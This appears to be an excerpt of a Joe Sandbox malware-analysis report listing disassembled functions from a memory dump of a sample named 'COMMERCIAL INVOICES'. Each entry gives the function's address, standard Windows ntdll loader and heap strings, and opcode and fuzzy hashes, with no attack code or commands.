                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                                                                                                                      • Opcode ID: e18650e5553efbc49ce13b0576d776eb72cc4c452e9da32db3c9b0cecf3e3cec
                                                                                                                                                                                                                                      • Instruction ID: 50a1a9bad30d865992525b73ecabc31bdbbabc0e228c6edca2b22db4639680a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e18650e5553efbc49ce13b0576d776eb72cc4c452e9da32db3c9b0cecf3e3cec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAA1B33192122ADBDB25CF58CC84BEAB7B5BF58354F2441E9DA08A7251D770AE81CF90
                                                                                                                                                                                                                                      Function 012464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012A10AE
                                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012A1028
                                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012A0FE5
                                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012A106B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                                                                                                                      • Opcode ID: 22db02b6027fd0ffcabc419fc3bd36b32ef2cb3df987818bb4d68f85f2cb783c
                                                                                                                                                                                                                                      • Instruction ID: 96887f4083ce6d26dbf3f988857515eae3dd6ee3e27670c494d0fcbb9e3b9f7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22db02b6027fd0ffcabc419fc3bd36b32ef2cb3df987818bb4d68f85f2cb783c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB71E3B19243469FCB21EF18C885BA77FA8AF95764F400468FE488B186D774D588CBD2
                                                                                                                                                                                                                                      Function 0126245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • apphelp.dll, xrefs: 01262462
                                                                                                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 012AA998
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012AA9A2
                                                                                                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012AA992
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                                                                                                      • Opcode ID: f692a436c91daa9145d9548f93e44bf8d8d55e0889b1e72719554438b322da34
                                                                                                                                                                                                                                      • Instruction ID: 443efb9f31fc73ba85ce2096e4200a0cbaea07aaa708d43d6a5f48a359b25816
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f692a436c91daa9145d9548f93e44bf8d8d55e0889b1e72719554438b322da34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61315971A20203EFDB31DF5DD882ABA7BBCFF84B04F564019EA116B245C7B49981C780
                                                                                                                                                                                                                                      Function 012529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0125327D
                                                                                                                                                                                                                                      • HEAP[%wZ]: , xrefs: 01253255
                                                                                                                                                                                                                                      • HEAP: , xrefs: 01253264
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                      • API String ID: 0-617086771
                                                                                                                                                                                                                                      • Opcode ID: eae516dc76b9e476af6f609b7981939abb183a65e16dcd4a41931f276c4f09f7
                                                                                                                                                                                                                                      • Instruction ID: 29ab8b0b4ef89faa24c6a9d63e476f4d8edf90c3ae1360299160154562f8a659
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae516dc76b9e476af6f609b7981939abb183a65e16dcd4a41931f276c4f09f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D92CD71A2424ADFDB65CF68C4807AEBBF1FF48310F188059E949AB392D775A941CF50
                                                                                                                                                                                                                                      Function 01250770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                                                                                                      • Opcode ID: 4a3e21ed9f5b2878f31c2161d26328c57bb4ac573e6239260310947564c38cfd
                                                                                                                                                                                                                                      • Instruction ID: 4c3a9542025ec4217f870f814ff670d71817381ea72a8334527779650e511237
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a3e21ed9f5b2878f31c2161d26328c57bb4ac573e6239260310947564c38cfd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F1CA70A20606DFEB25CF68C895B7AB7F5FF44704F1481A8EA069B385D770E981CB94
                                                                                                                                                                                                                                      Function 01266962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $@
                                                                                                                                                                                                                                      • API String ID: 0-1077428164
                                                                                                                                                                                                                                      • Opcode ID: f153905161d0147f7e341f8bac6be9cf0f6a06dfc8d4977fbb20a6348a8020a2
                                                                                                                                                                                                                                      • Instruction ID: 6791a9536ae576f3a55c988be0a3b260454b46755a8abcaf15e15c8a126ce126
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f153905161d0147f7e341f8bac6be9cf0f6a06dfc8d4977fbb20a6348a8020a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AC263716283429FD725CF28C841BABBBE9BF88754F04892DFA89C7281D774D845CB52
                                                                                                                                                                                                                                      Function 0123A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                                                                                                                      • Opcode ID: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
                                                                                                                                                                                                                                      • Instruction ID: 8ddd92bfad88e7e6cfb1732c4feace739cc91fabf58bbdb2a63194438c9b4487
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4db1b95187fc130e158030be4e7bf6e947c1eb8c99d3339e9348b95d6488409
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACA14F7192162A9BDF31DF68CC88BAAB7B8EF44710F1001E9EA09E7250D7359E84CF54
                                                                                                                                                                                                                                      Function 01260BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • LdrpCheckModule, xrefs: 012AA117
                                                                                                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 012AA10F
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012AA121
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-161242083
                                                                                                                                                                                                                                      • Opcode ID: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
                                                                                                                                                                                                                                      • Instruction ID: 57d917c4592c1f044697eeb8ba83d0fb23ed53dcd3b8e91deaa4b360f7519bf6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42d7f337743021886f8e83f96007b32fa5b43634b1d7edc33642f3ad89bbba81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2471A070A20206EFDB25DF68C981ABEB7F8FF44304F144469E9029B295E774AA81DB54
                                                                                                                                                                                                                                      Function 01250A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                                                                                                                      • Opcode ID: 0391b830dba0f090477ca22270e98d81d0587b3816047f2c0c2f14041f4cb0e9
                                                                                                                                                                                                                                      • Instruction ID: 69082c9afd72e830fc5e815999bff0accdd9d21dbf417e1072bdac214fb1c2bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0391b830dba0f090477ca22270e98d81d0587b3816047f2c0c2f14041f4cb0e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6461D370620302DFDB69CF28C881B6ABBE1FF84704F148559F9558F296D7B0E881CB95
                                                                                                                                                                                                                                      Function 0127C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 012B82D7
                                                                                                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 012B82DE
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012B82E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                                                                                                                      • Opcode ID: 44d330b4ad1974dfb3ba46d240be948822f318ff3c70057ad9377519c3a3145d
                                                                                                                                                                                                                                      • Instruction ID: eb8029e8acbb3cb035365b8de8df678b8464b3950a25d60b0462dbf82ccca568
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d330b4ad1974dfb3ba46d240be948822f318ff3c70057ad9377519c3a3145d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A941E4B1564306EBC725EB78D881B6BB7ECAF44790F00452AFA48D7290EB74D8108B95
                                                                                                                                                                                                                                      Function 012FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 012FC1C5
                                                                                                                                                                                                                                      • @, xrefs: 012FC1F1
                                                                                                                                                                                                                                      • PreferredUILanguages, xrefs: 012FC212
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                                                                                                                      • Opcode ID: a320d3259b7f060aab4cdac9161c3be22611576dcaa70089d2aaff98570005d3
                                                                                                                                                                                                                                      • Instruction ID: e2c03be998c23896130fb28c977c9baa6fe74389542e34367f0a4329251f7bef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a320d3259b7f060aab4cdac9161c3be22611576dcaa70089d2aaff98570005d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5415175E2020EEBDB11DAD8C891FEEFBB8EB14710F14407AE709A7280D7749A448B50
                                                                                                                                                                                                                                      Function 012D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                                                                                                                      • Opcode ID: 7628b6dea047d0ca4032ff31f9a0398dcc7e456611c8698bc8828077d3de51ec
                                                                                                                                                                                                                                      • Instruction ID: aca3e2449d9743237c246dcc7247d41cd93ff0fd40b78c75232e37334c0a1ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7628b6dea047d0ca4032ff31f9a0398dcc7e456611c8698bc8828077d3de51ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89413831A25299CBEB25EBE9C844BADBBB4FF55340F14045ADA01EBB81D774D901CB10
                                                                                                                                                                                                                                      Function 012C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 012C4899
                                                                                                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 012C4888
                                                                                                                                                                                                                                      • LdrpCheckRedirection, xrefs: 012C488F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                                                                                                                      • Opcode ID: 0d45e20484723d8f4e5c51c6f63b778868d04252b5fb8433777a97a1828f9f7c
                                                                                                                                                                                                                                      • Instruction ID: 32a5df9cf23161ba170353ed8dc340ee8c5cb3812629a2d678742f1893d6a5d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d45e20484723d8f4e5c51c6f63b778868d04252b5fb8433777a97a1828f9f7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C241C132A246929FCB22EF58D861A277BE8AF89F50F05075DEF49D7251D730D800CB91
                                                                                                                                                                                                                                      Function 01250BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                      • API String ID: 0-2558761708
                                                                                                                                                                                                                                      • Opcode ID: 7f732e734f87a2902d528d9d7425a9cdcb1f2883b01d8180cdcc54c6a091b4bd
                                                                                                                                                                                                                                      • Instruction ID: 9b2f837c0e29bce14ee7ca7dc55ad1c9ff0543ae5490601da46be9b6cb9f14b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f732e734f87a2902d528d9d7425a9cdcb1f2883b01d8180cdcc54c6a091b4bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110032334142DFDB69CE28C8C2B7AB3A4EF90716F598169F806CB251EB34D840CB59
                                                                                                                                                                                                                                      Function 012C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • LdrpInitializationFailure, xrefs: 012C20FA
                                                                                                                                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 012C20F3
                                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 012C2104
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                      • API String ID: 0-2986994758
                                                                                                                                                                                                                                      • Opcode ID: 760cf3e215d7514b903af1c2e8dafad6500f3112cf02efd883168fee76e7a4e8
                                                                                                                                                                                                                                      • Instruction ID: 3168a5c68317b57d477ae572deade1554476e1be0c7d7beb5182045de6cd28f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 760cf3e215d7514b903af1c2e8dafad6500f3112cf02efd883168fee76e7a4e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0C235660359FBE724EA4CCC42FA93B6CEB81F54F50006DF70077286D6F0A940C696
                                                                                                                                                                                                                                      Function 012503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: #%u
                                                                                                                                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                                                                                                                                      • Opcode ID: 7c7e7022b8e9af30d43c4492d23b4ce94a2b124d49e4ddaf9201be774055bca5
                                                                                                                                                                                                                                      • Instruction ID: 48fff94c4f2d06a130f4405d0e014a09937f5047b6d33385ea6bc0ab795a29e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c7e7022b8e9af30d43c4492d23b4ce94a2b124d49e4ddaf9201be774055bca5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81715B71A2014A9FDB01DFA8C981BAEBBF8FF08744F144065EA05E7251EA74ED41CBA4
                                                                                                                                                                                                                                      Function 0124A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • LdrResSearchResource Exit, xrefs: 0124AA25
                                                                                                                                                                                                                                      • LdrResSearchResource Enter, xrefs: 0124AA13
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                      • API String ID: 0-4066393604
                                                                                                                                                                                                                                      • Opcode ID: 5e0af527c403a7647c86432facdb3a7b2b67934534091af0659bf7191a4e483b
                                                                                                                                                                                                                                      • Instruction ID: 33bbcd388e2666b18d3d14b11619acaeca03b63e01b35adcc7cdacae9523e126
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e0af527c403a7647c86432facdb3a7b2b67934534091af0659bf7191a4e483b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4E18571EA021ADFEB26CF98C980BAEBBB9FF14310F104425EA02E7241E774D941CB50
                                                                                                                                                                                                                                      Function 0130A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: `$`
                                                                                                                                                                                                                                      • API String ID: 0-197956300
                                                                                                                                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                      • Instruction ID: ba1ce59a2f1b698fbf66dbc1db5c8a875640d4dbc66acdb7798535810d37c721
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FC1E0312143469BEB26CF28D861B6BBBE5BFC4718F088A2CF6968B2D0D775D505CB41
                                                                                                                                                                                                                                      Function 012BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                      • Opcode ID: f04514499edac90158b00adc772b1bf4050907588e187692f09f6fe346651db6
                                                                                                                                                                                                                                      • Instruction ID: a3b6fa51de18ca9d495813ae3d23202b3ea6e99745a4be758be04ca6457926fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f04514499edac90158b00adc772b1bf4050907588e187692f09f6fe346651db6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20615C71E206199FDB14DFA8C880BEEBBB9FB58740F15806DE659EB291D731A900CB50
                                                                                                                                                                                                                                      Function 012E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: @$MUI
                                                                                                                                                                                                                                      • API String ID: 0-17815947
                                                                                                                                                                                                                                      • Opcode ID: 8854eb02255c07a41018e4b54e7622a2c59f4c02ae6ee818586608bbdd2a6b37
                                                                                                                                                                                                                                      • Instruction ID: 4561cadf93c4ecddf81833aaf4524f729ecf970777756c30e1954867a9ab5d5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8854eb02255c07a41018e4b54e7622a2c59f4c02ae6ee818586608bbdd2a6b37
